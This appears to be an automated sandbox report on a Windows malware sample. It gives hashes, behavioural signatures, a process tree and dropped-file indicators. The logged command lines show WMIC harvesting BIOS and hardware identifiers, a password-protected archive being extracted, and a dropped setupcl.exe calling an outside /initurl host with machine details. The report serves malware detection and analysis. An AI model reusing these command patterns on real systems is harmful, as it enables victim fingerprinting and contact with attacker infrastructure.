Analysis
-
max time kernel
94s -
max time network
95s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
28-09-2024 00:40
Static task
static1
Behavioral task
behavioral1
Sample
fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/7za.exe
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/7za.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240802-en
General
-
Target
fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe
-
Size
406KB
-
MD5
fb3051c53dcfbb72d9cd6bb76f5ef76e
-
SHA1
eaee3aa132ad329574b61d2d5e6d70a6467df022
-
SHA256
9a6fc943eb6c38877d615eb2cd6311f0543b22c6b694af463484a6856c0920c0
-
SHA512
0eac300abd754fa9a65b991de0288957b1d2fc60a948e8206b1c12fa38835cf40d7b7cbe6e1e07b740e405c28c78ef3b8c9df79bc137f846df2f78e8dd1036f0
-
SSDEEP
12288:WA0i50Gqw1D4xN25VbN2ZDc9wDvGbfEk43rP/n6zOovaYm:WAfyGq8DQCVbN2ZDc9uGb8XD/n6z/m
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
7za.exesetupcl.exepid process 5068 7za.exe 1300 setupcl.exe -
Loads dropped DLL 5 IoCs
Processes:
fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exepid process 1352 fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe 1352 fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe 1352 fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe 1352 fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe 1352 fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
setupcl.exewmic.exefb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exe7za.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setupcl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7za.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
WMIC.exeWMIC.exedescription pid process Token: SeIncreaseQuotaPrivilege 2852 WMIC.exe Token: SeSecurityPrivilege 2852 WMIC.exe Token: SeTakeOwnershipPrivilege 2852 WMIC.exe Token: SeLoadDriverPrivilege 2852 WMIC.exe Token: SeSystemProfilePrivilege 2852 WMIC.exe Token: SeSystemtimePrivilege 2852 WMIC.exe Token: SeProfSingleProcessPrivilege 2852 WMIC.exe Token: SeIncBasePriorityPrivilege 2852 WMIC.exe Token: SeCreatePagefilePrivilege 2852 WMIC.exe Token: SeBackupPrivilege 2852 WMIC.exe Token: SeRestorePrivilege 2852 WMIC.exe Token: SeShutdownPrivilege 2852 WMIC.exe Token: SeDebugPrivilege 2852 WMIC.exe Token: SeSystemEnvironmentPrivilege 2852 WMIC.exe Token: SeRemoteShutdownPrivilege 2852 WMIC.exe Token: SeUndockPrivilege 2852 WMIC.exe Token: SeManageVolumePrivilege 2852 WMIC.exe Token: 33 2852 WMIC.exe Token: 34 2852 WMIC.exe Token: 35 2852 WMIC.exe Token: 36 2852 WMIC.exe Token: SeIncreaseQuotaPrivilege 2852 WMIC.exe Token: SeSecurityPrivilege 2852 WMIC.exe Token: SeTakeOwnershipPrivilege 2852 WMIC.exe Token: SeLoadDriverPrivilege 2852 WMIC.exe Token: SeSystemProfilePrivilege 2852 WMIC.exe Token: SeSystemtimePrivilege 2852 WMIC.exe Token: SeProfSingleProcessPrivilege 2852 WMIC.exe Token: SeIncBasePriorityPrivilege 2852 WMIC.exe Token: SeCreatePagefilePrivilege 2852 WMIC.exe Token: SeBackupPrivilege 2852 WMIC.exe Token: SeRestorePrivilege 2852 WMIC.exe Token: SeShutdownPrivilege 2852 WMIC.exe Token: SeDebugPrivilege 2852 WMIC.exe Token: SeSystemEnvironmentPrivilege 2852 WMIC.exe Token: SeRemoteShutdownPrivilege 2852 WMIC.exe Token: SeUndockPrivilege 2852 WMIC.exe Token: SeManageVolumePrivilege 2852 WMIC.exe Token: 33 2852 WMIC.exe Token: 34 2852 WMIC.exe Token: 35 2852 WMIC.exe Token: 36 2852 WMIC.exe Token: SeIncreaseQuotaPrivilege 1696 WMIC.exe Token: SeSecurityPrivilege 1696 WMIC.exe Token: SeTakeOwnershipPrivilege 1696 WMIC.exe Token: SeLoadDriverPrivilege 1696 WMIC.exe Token: SeSystemProfilePrivilege 1696 WMIC.exe Token: SeSystemtimePrivilege 1696 WMIC.exe Token: SeProfSingleProcessPrivilege 1696 WMIC.exe Token: SeIncBasePriorityPrivilege 1696 WMIC.exe Token: SeCreatePagefilePrivilege 1696 WMIC.exe Token: SeBackupPrivilege 1696 WMIC.exe Token: SeRestorePrivilege 1696 WMIC.exe Token: SeShutdownPrivilege 1696 WMIC.exe Token: SeDebugPrivilege 1696 WMIC.exe Token: SeSystemEnvironmentPrivilege 1696 WMIC.exe Token: SeRemoteShutdownPrivilege 1696 WMIC.exe Token: SeUndockPrivilege 1696 WMIC.exe Token: SeManageVolumePrivilege 1696 WMIC.exe Token: 33 1696 WMIC.exe Token: 34 1696 WMIC.exe Token: 35 1696 WMIC.exe Token: 36 1696 WMIC.exe Token: SeIncreaseQuotaPrivilege 1696 WMIC.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
setupcl.exepid process 1300 setupcl.exe 1300 setupcl.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exesetupcl.exedescription pid process target process PID 1352 wrote to memory of 2852 1352 fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe WMIC.exe PID 1352 wrote to memory of 2852 1352 fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe WMIC.exe PID 1352 wrote to memory of 2852 1352 fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe WMIC.exe PID 1352 wrote to memory of 1696 1352 fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe WMIC.exe PID 1352 wrote to memory of 1696 1352 fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe WMIC.exe PID 1352 wrote to memory of 1696 1352 fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe WMIC.exe PID 1352 wrote to memory of 4796 1352 fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe WMIC.exe PID 1352 wrote to memory of 4796 1352 fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe WMIC.exe PID 1352 wrote to memory of 4796 1352 fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe WMIC.exe PID 1352 wrote to memory of 3244 1352 fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe WMIC.exe PID 1352 wrote to memory of 3244 1352 fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe WMIC.exe PID 1352 wrote to memory of 3244 1352 fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe WMIC.exe PID 1352 wrote to memory of 5068 1352 fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe 7za.exe PID 1352 wrote to memory of 5068 1352 fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe 7za.exe PID 1352 wrote to memory of 5068 1352 fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe 7za.exe PID 1352 wrote to memory of 1300 1352 fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe setupcl.exe PID 1352 wrote to memory of 1300 1352 fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe setupcl.exe PID 1352 wrote to memory of 1300 1352 fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe setupcl.exe PID 1300 wrote to memory of 3108 1300 setupcl.exe wmic.exe PID 1300 wrote to memory of 3108 1300 setupcl.exe wmic.exe PID 1300 wrote to memory of 3108 1300 setupcl.exe wmic.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1352 -
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC csproduct Get UUID /FORMAT:textvaluelist.xsl2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2852
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC bios Get SerialNumber /FORMAT:textvaluelist.xsl2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC bios Get Version /FORMAT:textvaluelist.xsl2⤵
- System Location Discovery: System Language Discovery
PID:4796
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC csproduct Get Name /FORMAT:textvaluelist.xsl2⤵
- System Location Discovery: System Language Discovery
PID:3244
-
-
C:\Users\Admin\AppData\Local\Temp\nsh9879.tmp\7za.exe7za.exe e -y -p"16171c270462ebc633f7165f63a6efb3" [RANDOM_STRING].7z2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5068
-
-
C:\Users\Admin\AppData\Local\Temp\nsh9879.tmp\setupcl.exe"C:\Users\Admin\AppData\Local\Temp\nsh9879.tmp\setupcl.exe" /initurl http://sub.yorkshatb.com/init/fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118/:uid:? /affid "-" /id "0" /name " " /uniqid fb3051c53dcfbb72d9cd6bb76f5ef76e_JaffaCakes118 /uuid stance(s) Available. /biosserial /biosversion BOCHS - 1 /csname stance(s) Available.2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic bios get serialnumber, version3⤵
- System Location Discovery: System Language Discovery
PID:3108
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
574KB
MD542badc1d2f03a8b1e4875740d3d49336
SHA1cee178da1fb05f99af7a3547093122893bd1eb46
SHA256c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf
SHA5126bc519a7368ee6bd8c8f69f2d634dd18799b4ca31fbc284d2580ba625f3a88b6a52d2bc17bea0e75e63ca11c10356c47ee00c2c500294abcb5141424fc5dc71c
-
Filesize
80KB
MD566f4b6c0ba8f9cf20d66c83d104112d3
SHA15b1bd289c22fa28b646366cd0531f032f461b7dd
SHA2569553f804705f20b6ac55b6588ae2d3d2e6dbc669f34be19359cd8b668bc71747
SHA512144ce1d88650379ed33af8938ae30c10ad70dec09f038d1995d3af9036e90eb84199ac8428cbb17f4ff3f34316fa5a9aec125180513278d32b80738f5cb4af6b
-
Filesize
8KB
MD5b8be6632a7dc8136ff01338be40fe701
SHA1043fa16929b2af5ed5c1c59b4035a10cf765fb43
SHA256289786fe13801467653eb2712f47f162d6fd3fc2d844be342282f75fc2b2a085
SHA512403474154ff8500e5aae2b4466c652e5d066af2c55d8f158e6f007492ceb1f3abcc6cca80842b90900db02db4258ddcda75dec1d1799af24969c35811891e5b8
-
Filesize
193KB
MD510bd2af1b07ec6bc9cd17ba512569e59
SHA1807e17ab1b98177e135d30941b45081960d1e866
SHA2569c620ef6eac3d0d9d3f6f2622a53d1f543cebd93846636ba397683962c07fc7c
SHA512deacd041f12b6ec74f9e4488874ce962037990ed0ae424aaeabf2c35876b2ebbb943f92e9a4ffe504718bb00021209b035439ea4d7c64a4031b86ce9104ce3ed